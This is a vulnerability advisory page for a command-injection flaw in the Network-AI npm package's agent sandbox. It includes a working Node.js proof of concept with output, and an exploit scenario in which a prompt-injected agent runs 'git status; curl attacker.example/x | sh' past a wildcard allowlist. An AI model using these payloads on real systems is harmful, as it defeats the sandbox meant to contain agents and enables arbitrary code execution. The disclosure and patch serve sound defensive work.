Network-AI CVE-2026-54051
CRITICALSeverity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Exploitation requires an operator-granted wildcard allowlist and a caller authorized to invoke ShellExecutor, so AV:L and PR:L; sandbox escape to host process gives S:C with full C/I/A impact.
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
The agent sandbox gates shell commands behind an allowlist (SandboxPolicy.isCommandAllowed), which THREAT_MODEL.md calls the main control against a compromised agent (Adversary 3.2). The allowlist glob-matches the whole command string, but ShellExecutor runs that string through /bin/sh -c. So any wildcard allow such as git *, npm * or node * also matches git status; <anything>, and a scoped command becomes arbitrary execution.
Root cause
Matching and execution disagree on what a command is. Lines pinned to 40e42d7 (lib/agent-runtime.ts is identical to the v5.8.5 tag).
isCommandAllowedmatches the full string, with no tokenizing and no metacharacter check:
https://github.com/Jovancoding/Network-AI/blob/40e42d7a0a966b948953b3c524cf15355d20ef5e/lib/agent-runtime.ts#L248-L260
globMatchcompiles*to.*and anchors it, sogit *becomes^git .*$and matchesgit status; id:
https://github.com/Jovancoding/Network-AI/blob/40e42d7a0a966b948953b3c524cf15355d20ef5e/lib/agent-runtime.ts#L353-L360
ShellExecutor.executeonly checksisCommandAllowed, neverrequiresApproval:
https://github.com/Jovancoding/Network-AI/blob/40e42d7a0a966b948953b3c524cf15355d20ef5e/lib/agent-runtime.ts#L387-L391
spawnCommandruns the approved string via/bin/sh -c, so;,|and$(...)are interpreted by the shell:
https://github.com/Jovancoding/Network-AI/blob/40e42d7a0a966b948953b3c524cf15355d20ef5e/lib/agent-runtime.ts#L427-L431
Reachability
Any agent or caller allowed to run commands hits this when the operator allowlist has a wildcard entry. A plain git * is enough. No fresh-install precondition and no extra misconfiguration.
PoC
Installs network-ai@5.8.5, allows git *, then runs git status; id > marker. The allowlist accepts it and the injected id runs.
Run: npm i network-ai@5.8.5 && node poc-316.js
'use strict';
const os = require('os');
const fs = require('fs');
const path = require('path');
const { SandboxPolicy, ShellExecutor } = require('network-ai');
(async () => {
const base = fs.mkdtempSync(path.join(os.tmpdir(), 'nai-poc-316-'));
const marker = path.join(base, 'PWNED-316.txt');
const policy = new SandboxPolicy({ basePath: base, allowedCommands: ['git *'] });
const sh = new ShellExecutor(policy);
const payload = `git status; id > ${marker}; echo INJECTED`;
console.log('version:', require('network-ai/package.json').version);
console.log('allowed:', policy.isCommandAllowed(payload));
await sh.execute(payload);
const ran = fs.existsSync(marker);
console.log('injected id ran:', ran, ran ? fs.readFileSync(marker, 'utf8').trim() : '');
console.log(ran ? 'VULNERABLE' : 'not reproduced');
process.exit(ran ? 0 : 1);
})().catch(err => { console.error(err); process.exit(3); });Output:
version: 5.8.5
allowed: true
injected id ran: true uid=501(alex) gid=20(staff) groups=20(staff),...
VULNERABLEImpact
Arbitrary command execution as the orchestrator process. It defeats the one control meant to contain a compromised agent, so any agent with a single wildcard allow (git *, npm *, node *) can run anything. node * and npm * are direct code exec even without metacharacters.
Possible fix
Do not run agent commands through a shell. Parse to argv and spawn(file, args, { shell: false }), allowlist on the executable plus argument patterns, and reject shell metacharacters. Anchoring the regex alone is not enough; the whole-string match plus /bin/sh -c is the bug.
Patch
Fixed in v5.9.1 (commit 379f776). ShellExecutor now executes via spawn(file, args, { shell: false }) using a quote-aware parsed argv, so no shell is invoked. SandboxPolicy.isCommandAllowed and the new SandboxPolicy.tokenizeCommand reject any unquoted shell metacharacter (; & | $ ( ) < > { }` newline) or unterminated quote before the allowlist glob match; quoted metacharacters are preserved as literal argument data.
Remediation: upgrade to network-ai@5.9.1 or later. As defense in depth, avoid broad wildcard allowlist entries such as node * / npm * which are direct code execution by design.
Articles & Coverage 2
AnalysisAI
Command injection in the Network-AI npm package (network-ai < 5.9.1) lets any agent or caller granted a wildcard allowlist entry such as git *, npm *, or node * execute arbitrary shell commands as the orchestrator process. The flaw stems from SandboxPolicy.isCommandAllowed glob-matching the entire command string while ShellExecutor runs it through /bin/sh -c, so shell metacharacters like ;, |, and $(...) smuggle additional commands past the sandbox. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Requires (1) network-ai version < 5.9.1 installed and used as the agent runtime; (2) the operator-configured `SandboxPolicy.allowedCommands` list contains at least one wildcard glob entry such as `git *`, `npm *`, or `node *` - entries without trailing wildcards or with no metacharacter-sensitive prefix do not trigger the bug; (3) an agent or caller that can submit command strings to `ShellExecutor.execute`. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The reporter-assigned CVSS 3.1 vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (9.9) overstates exploitability for many deployments: AV:N assumes the agent input arrives over the network, but the vulnerable code path is reached only when an operator has already granted a wildcard allowlist entry and an agent or caller is permitted to submit commands, which is closer to a local/adjacent trust boundary. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An operator deploys network-ai 5.8.5 with an allowlist containing `git *` to let the agent perform repository operations. A prompt-injected or otherwise compromised agent submits `git status; curl attacker.example/x | sh`; `isCommandAllowed` returns true because the string starts with `git `, and `/bin/sh -c` executes both statements, giving the attacker arbitrary code execution as the orchestrator process. … |
| Remediation | Vendor-released patch: network-ai 5.9.1. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Audit all Network-AI deployments to identify wildcard allowlist entries and affected versions (< 5.9.1). …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote
Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t
Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete
Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner
Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi
Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin
The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic
Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read
Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio
Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat
The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se
Same weakness CWE-78 – OS Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-qw6v-5fcf-5666